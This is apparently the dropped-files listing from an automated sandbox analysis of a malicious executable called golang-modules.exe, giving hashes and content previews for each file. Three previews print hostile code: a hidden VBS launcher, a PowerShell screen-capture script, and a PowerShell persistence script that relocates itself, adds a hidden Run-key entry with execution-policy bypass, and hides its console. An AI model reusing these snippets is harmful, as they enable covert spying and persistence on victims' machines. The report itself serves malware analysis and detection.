                                  SHA1:AE0E43C2DAF4C913F5DB17F4D9197F34AB52E254
                                  SHA-256:CCA09191A1A96D288A4873F79A0916D9984BD6BE8DCBD0C25D60436D46A15CA1
                                  SHA-512:36C69C26FD84B9637B370A5FE214A90778C9ADE3B11664E961FE14226E0300F29C2F43D3A1D1C655D9F2951918769259928BBBC5A9D83596A1AFC42420FC1A54
                                  Malicious:true
                                  Preview:Set objShell = CreateObject("WScript.Shell").objShell.Run "C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat", 0, True.Set objShell = Nothing
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 12, database pages 45, cookie 0x20, schema 4, UTF-8, version-valid-for 12
                                  Category:dropped
                                  Size (bytes):92160
                                  Entropy (8bit):1.312358107493334
                                  Encrypted:false
                                  SSDEEP:192:IBUfJShWdeeH9JbMBlTJjnhosn3rk60VuH3o:KUfJSeeY9qnhosn3I1VuH3o
                                  MD5:C7FCAD01A455E324A5BEBE1A3447BA75
                                  SHA1:0B0FC584FB642B3E92C1286F3B457F2B2D4A2E11
                                  SHA-256:7B957014898773C5ECCA4FEA0964AE1E100776C1648D314CBCC277275392FDF1
                                  SHA-512:FD1E791CE49ACE8962A71B6BEF2D257C8A4A38C35055C8736B3962A75715C328BD0ECE8D6A37497CC9617A34250572CFFF2264D1AC2C1D530C35C4DE4C510745
                                  Malicious:false
                                  Preview:SQLite format 3......@ .......-........... ......................................................S`...........(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 22, 1st free page 7, free pages 2, cookie 0x10, schema 4, UTF-8, version-valid-for 3
                                  Category:dropped
                                  Size (bytes):45056
                                  Entropy (8bit):0.7853305971874845
                                  Encrypted:false
                                  SSDEEP:48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
                                  MD5:00C036C61F625BF9D25362B9BE24ADEB
                                  SHA1:6738C3D037E4A2E9F41B1398BA88E5771532F593
                                  SHA-256:0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
                                  SHA-512:711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
                                  Malicious:false
                                  Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 12, database pages 45, cookie 0x20, schema 4, UTF-8, version-valid-for 12
                                  Category:dropped
                                  Size (bytes):92160
                                  Entropy (8bit):1.312358107493334
                                  Encrypted:false
                                  SSDEEP:192:IBUfJShWdeeH9JbMBlTJjnhosn3rk60VuH3o:KUfJSeeY9qnhosn3I1VuH3o
                                  MD5:C7FCAD01A455E324A5BEBE1A3447BA75
                                  SHA1:0B0FC584FB642B3E92C1286F3B457F2B2D4A2E11
                                  SHA-256:7B957014898773C5ECCA4FEA0964AE1E100776C1648D314CBCC277275392FDF1
                                  SHA-512:FD1E791CE49ACE8962A71B6BEF2D257C8A4A38C35055C8736B3962A75715C328BD0ECE8D6A37497CC9617A34250572CFFF2264D1AC2C1D530C35C4DE4C510745
                                  Malicious:false
                                  Preview:SQLite format 3......@ .......-........... ......................................................S`...........(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                  Category:dropped
                                  Size (bytes):122880
                                  Entropy (8bit):1.1414673161713362
                                  Encrypted:false
                                  SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                  MD5:24937DB267D854F3EF5453E2E54EA21B
                                  SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                  SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                  SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                  Malicious:false
                                  Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                  Category:dropped
                                  Size (bytes):57344
                                  Entropy (8bit):0.7310370201569906
                                  Encrypted:false
                                  SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                  MD5:A802F475CA2D00B16F45FEA728F2247C
                                  SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                  SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                  SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                  Malicious:false
                                  Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                  Category:dropped
                                  Size (bytes):122880
                                  Entropy (8bit):1.1414673161713362
                                  Encrypted:false
                                  SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                  MD5:24937DB267D854F3EF5453E2E54EA21B
                                  SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                  SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                  SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                  Malicious:false
                                  Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):11608
                                  Entropy (8bit):4.890472898059848
                                  Encrypted:false
                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                  Malicious:false
                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):2836
                                  Entropy (8bit):5.4152274150913176
                                  Encrypted:false
                                  SSDEEP:48:5AzsSGfs4/ymTx4RfoUP7m9qr9t5/78NRH2GxJZKaVEouYAgwd64rHLjtvk:5AzlGH/vFIwB9qrh7KRPJ5Eo9Adrxk
                                  MD5:E9E27A0544BE1E5A18AE00E944A9A751
                                  SHA1:2AB3513607BBAFE6563CEE4F1B95E4EA27B5CACB
                                  SHA-256:52CA0A975895867D37048F72BD24AB8295FF6935BDE1A9CA357A42344E0D50D0
                                  SHA-512:3AEE8F8FD38F768F6BAB831793EB7CAEAE0010EB63B38D38EECFD736589A3ABBB8E7561EF5CC67F3482809F22CA33A1609564E78BEC3BF9EC704F9F44CFE7A7A
                                  Malicious:false
                                  Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4...............F;7..C..f.G..........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:Unicode text, UTF-8 text
                                  Category:dropped
                                  Size (bytes):2843
                                  Entropy (8bit):4.832258429623731
                                  Encrypted:false
                                  SSDEEP:48:+CQH/0saz6McGJrOPBuNVcdIJ9pC5BdUIfPFEJkxyKCp:+CQf0saOMNJrOPB4VHJ9pCVeCZq
                                  MD5:CB9AE21CC31B18B7E8852A73513B9FAA
                                  SHA1:D536F3EFDE2B24897F10B0C612766D49942A04AF
                                  SHA-256:1280AA7832DE7821F6C8C4843FFD4D7081491872CCC5055EFBD4A35DE782F31B
                                  SHA-512:6E29ED4C9AD55699C923875963011F34F9E71DFFE0742E9900E90C7812C832C01F0005995057EF6A4D4CD68503C63F981E67374CA3790ADCECECAB978C04E7EF
                                  Malicious:true
                                  Preview:.try {. # Capture screenshots of all screens. Add-Type -AssemblyName System.Windows.Forms. Add-Type -AssemblyName System.Drawing.. # Get all screens. $screens = [System.Windows.Forms.Screen]::AllScreens.. # Calculate the total width and maximum height of all screens. $totalWidth = ($screens | ForEach-Object { $_.Bounds.Width } | Measure-Object -Sum).Sum. $maxHeight = ($screens | ForEach-Object { $_.Bounds.Height } | Measure-Object -Max).Maximum.. # Check if the calculated values are valid. if ($totalWidth -le 0 -or $maxHeight -le 0) {. throw "Error: Unable to calculate valid screen dimensions.". }.. # Try to create a bitmap with a PixelFormat argument. try {. $combinedScreenshot = New-Object System.Drawing.Bitmap $totalWidth, $maxHeight, ([System.Drawing.Imaging.PixelFormat]::Format32bppArgb). } catch {. throw "Error creating Bitmap object: $_". }.. # Try to create a graphics object. try {. $graphics = [Syst
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):3255
                                  Entropy (8bit):5.544772037808569
                                  Encrypted:false
                                  SSDEEP:96:veVLrjvVBPf+mRcimSumz4mgHmnFIm9oSmME7LmDSbHgmwwY6W:mVlMFHmSyXTEHVbAHwlW
                                  MD5:A8834C224450D76421D8E4A34B08691F
                                  SHA1:73ED4011BC60BA616B7B81FF9C9CAD82FB517C68
                                  SHA-256:817C184E6A3E7D1FF60B33EC777E23E8E0697E84EFDE8E422833F05584E00EA5
                                  SHA-512:672B3ECA54DFF4316DB904D16C2333247E816E0CD8EF2D866111DDB49AB491568CC12D7263891707403DD14962326404C13855D5DE1AE148114A51CB7D5E5596
                                  Malicious:true
                                  Preview:.$sctpth = $MyInvocation.MyCommand.Path.$ran = -join ((65..90) + (97..122) | Get-Random -Count 15 | ForEach-Object {[char]$_}).$ranpth = if ((Get-Random) % 2) { Join-Path $env:TEMP "$ran.ps1" } else { Join-Path $env:APPDATA "$ran.ps1" }.Copy-Item -Path $sctpth -Destination $ranpth -Force.Remove-Item -Path $sctpth -Force..$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run".$valn = "Powershell".$val = """powershell.exe"" -WindowStyle Hidden -ExecutionPolicy Bypass -File ""$ranpth"""..if (!(Test-Path $key)) {. New-Item -Path $key -Force | Out-Null.}..Set-ItemProperty -Path $key -Name $valn -Value $val..Add-Type -Name Window -Namespace Console -MemberDefinition '.[DllImport("Kernel32.dll")].public static extern IntPtr GetConsoleWindow();.[DllImport("user32.dll")].public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);.public static void Hide().{. IntPtr hWnd = GetConsoleWindow();. if(hWnd != IntPtr.Zero). {. ShowWindow(hWnd, 0);. }.}.'.[Console.Windo
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Thu Jul 11 06:33:20 2024, 1st section name ".debug$S"
                                  Category:dropped
                                  Size (bytes):1332
                                  Entropy (8bit):4.004029517614258
                                  Encrypted:false
                                  SSDEEP:24:HLzW91v1DURHUfwK1mNII+ycuZhNYakS0PNnqS2d:C1QRpK1mu1ulYa3UqSG
                                  MD5:365C1EBB1C1C0803D25D344C0E8E8FED
                                  SHA1:5858FABE5FA364CF2DD96A1518979DD369472B05
                                  SHA-256:BAFF48A7451911602AE1666B43E4B6943C47F7C4CCA138344DACB62E8C5E340F
                                  SHA-512:FFAB930155802B2E096B82A57C69B6E27B9DC5BAB5B778496E4E7870CE233B3CA484FA73BA98C72333501C86198844CAA0434C06019C51BF07EC11CBC16EC295
                                  Malicious:false
                                  Preview:L....|.f.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\oauixwyt\CSC1DE16476F16E4E708A1B2D331C6787A.TMP.................P..q....eO,.............5.......C:\Users\user\AppData\Local\Temp\RES57FC.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.a.u.i.x.w.y.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Thu Jul 11 06:33:31 2024, 1st section name ".debug$S"
                                  Category:dropped
                                  Size (bytes):1332
                                  Entropy (8bit):4.025648893086949
                                  Encrypted:false
                                  SSDEEP:24:HezW91veeV1HdnwK1mNII+ycuZhNOeGakSHeXPNnqS2d:9eY19wK1mu1ulOeGa3HeFqSG
                                  MD5:5823E067CF66F8B12491EF105AE9A8E5
                                  SHA1:866432908E55A779AB29435E5B7B1D124580E0F3
                                  SHA-256:AE0F4706EF8473D4B3279533D77E52F3AEFA052320BD739621D5FA43600BCCAE
                                  SHA-512:F7AADDE8C55EB373B53377A7F85433517161404E6449278D12E7F1FD97732D1961BEEDDC5553B9FC0C61EF437947D024758600F4C2F7A02537138948F5772E88
                                  Malicious:false
                                  Preview:L....|.f.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\wy53vvk1\CSC3C5D7F16B844BD8853D45FBCDF88AC3.TMP.................Z..b{g!...>,.w..........5.......C:\Users\user\AppData\Local\Temp\RES82F4.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.y.5.3.v.v.k.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
